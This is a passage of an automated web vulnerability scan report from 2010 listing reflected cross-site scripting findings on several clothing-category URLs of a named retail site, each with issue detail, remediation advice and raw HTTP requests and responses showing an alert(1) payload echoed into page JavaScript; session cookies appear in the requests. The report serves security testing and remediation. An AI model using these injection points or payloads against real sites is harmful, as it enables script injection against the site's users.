GET /women/knitwear/?44619"-alert(1)-"dbe8083a92f=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c1d6"-alert(1)-"97d7c111880 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /women4c1d6"-alert(1)-"97d7c111880/shirts/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:06:19 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=ri1i2t61fio44aap2f55471d51; expires=Tue, 09-Nov-2010 17:06:19 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29348
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/women4c1d6"-alert(1)-"97d7c111880/shirts/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef5c3"-alert(1)-"8cfe24c93e6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /women/shirtsef5c3"-alert(1)-"8cfe24c93e6/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:06:48 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=j2ij7luab3bn191k5buu7ph790; expires=Tue, 09-Nov-2010 17:06:48 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29348
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/women/shirtsef5c3"-alert(1)-"8cfe24c93e6/"); //]]> ...[SNIP]...
1.266. http://www.fredperry.com/women/shirts/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/women/shirts/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2d16"-alert(1)-"a05c72fdefc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /women/shirts/?e2d16"-alert(1)-"a05c72fdefc=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ad15"-alert(1)-"728545c861 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /women2ad15"-alert(1)-"728545c861/skirts/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:09:00 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=2do6j1q2fvqoha0sk554ck7jb6; expires=Tue, 09-Nov-2010 17:09:00 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29347
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/women2ad15"-alert(1)-"728545c861/skirts/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f9c8"-alert(1)-"3fa819d4374 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /women/skirts1f9c8"-alert(1)-"3fa819d4374/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:09:19 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=m60qji43298l5lpmehltqknat7; expires=Tue, 09-Nov-2010 17:09:19 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29348
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/women/skirts1f9c8"-alert(1)-"3fa819d4374/"); //]]> ...[SNIP]...
1.269. http://www.fredperry.com/women/skirts/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/women/skirts/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f77ce"-alert(1)-"386d0fe9234 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /women/skirts/?f77ce"-alert(1)-"386d0fe9234=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9b0f"-alert(1)-"ae623475fab was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /womend9b0f"-alert(1)-"ae623475fab/t-shirts/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:10:44 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=j0ul9h5mu39ujejiljj4rrape5; expires=Tue, 09-Nov-2010 17:10:44 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29350
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/womend9b0f"-alert(1)-"ae623475fab/t-shirts/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb784"-alert(1)-"01ef9dfe59 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /women/t-shirtscb784"-alert(1)-"01ef9dfe59/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:11:01 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=ppmqmsgne1hf0t6hk5mtjo9s20; expires=Tue, 09-Nov-2010 17:11:01 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29349
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/women/t-shirtscb784"-alert(1)-"01ef9dfe59/"); //]]> ...[SNIP]...
1.272. http://www.fredperry.com/women/t-shirts/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/women/t-shirts/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66544"-alert(1)-"f7acbf1dc58 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /women/t-shirts/?66544"-alert(1)-"f7acbf1dc58=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a53c7"-alert(1)-"994703c0c99 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /womena53c7"-alert(1)-"994703c0c99/tennis/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:05:39 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=fo3o6qv4af1kubaotq1ts943l4; expires=Tue, 09-Nov-2010 17:05:39 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29348
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/womena53c7"-alert(1)-"994703c0c99/tennis/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4cf10"-alert(1)-"ad3cd9e9c46 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /women/tennis4cf10"-alert(1)-"ad3cd9e9c46/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:05:57 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=apfgaeqod633ssa6ckondoiia3; expires=Tue, 09-Nov-2010 17:05:57 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29348
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/women/tennis4cf10"-alert(1)-"ad3cd9e9c46/"); //]]> ...[SNIP]...
1.275. http://www.fredperry.com/women/tennis/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/women/tennis/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb341"-alert(1)-"426635fe36 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /women/tennis/?bb341"-alert(1)-"426635fe36=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload febe6"-alert(1)-"e4e83b03fd7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /womenfebe6"-alert(1)-"e4e83b03fd7/trousers/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:08:28 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=gph8cguvj4t1eieejeie3ppq33; expires=Tue, 09-Nov-2010 17:08:29 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29350
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/womenfebe6"-alert(1)-"e4e83b03fd7/trousers/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4b5d"-alert(1)-"465b00fb799 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /women/trousersa4b5d"-alert(1)-"465b00fb799/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:08:48 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=hbq1jlki9npmfs836p444rlnf0; expires=Tue, 09-Nov-2010 17:08:48 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29350
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/women/trousersa4b5d"-alert(1)-"465b00fb799/"); //]]> ...[SNIP]...
1.278. http://www.fredperry.com/women/trousers/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/women/trousers/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ea727"-alert(1)-"53defb14701 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /women/trousers/?ea727"-alert(1)-"53defb14701=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66513"-alert(1)-"6d7e2439d02 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /women66513"-alert(1)-"6d7e2439d02/woven-shirts/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:09:33 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=qvi6uvqv40uokanqel4ccrt0e6; expires=Tue, 09-Nov-2010 17:09:33 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29354
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/women66513"-alert(1)-"6d7e2439d02/woven-shirts/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3987"-alert(1)-"e15c6a40149 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /women/woven-shirtse3987"-alert(1)-"e15c6a40149/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:10:04 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=pifjben75gbg7vjdt8e2c1rte2; expires=Tue, 09-Nov-2010 17:10:04 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29354
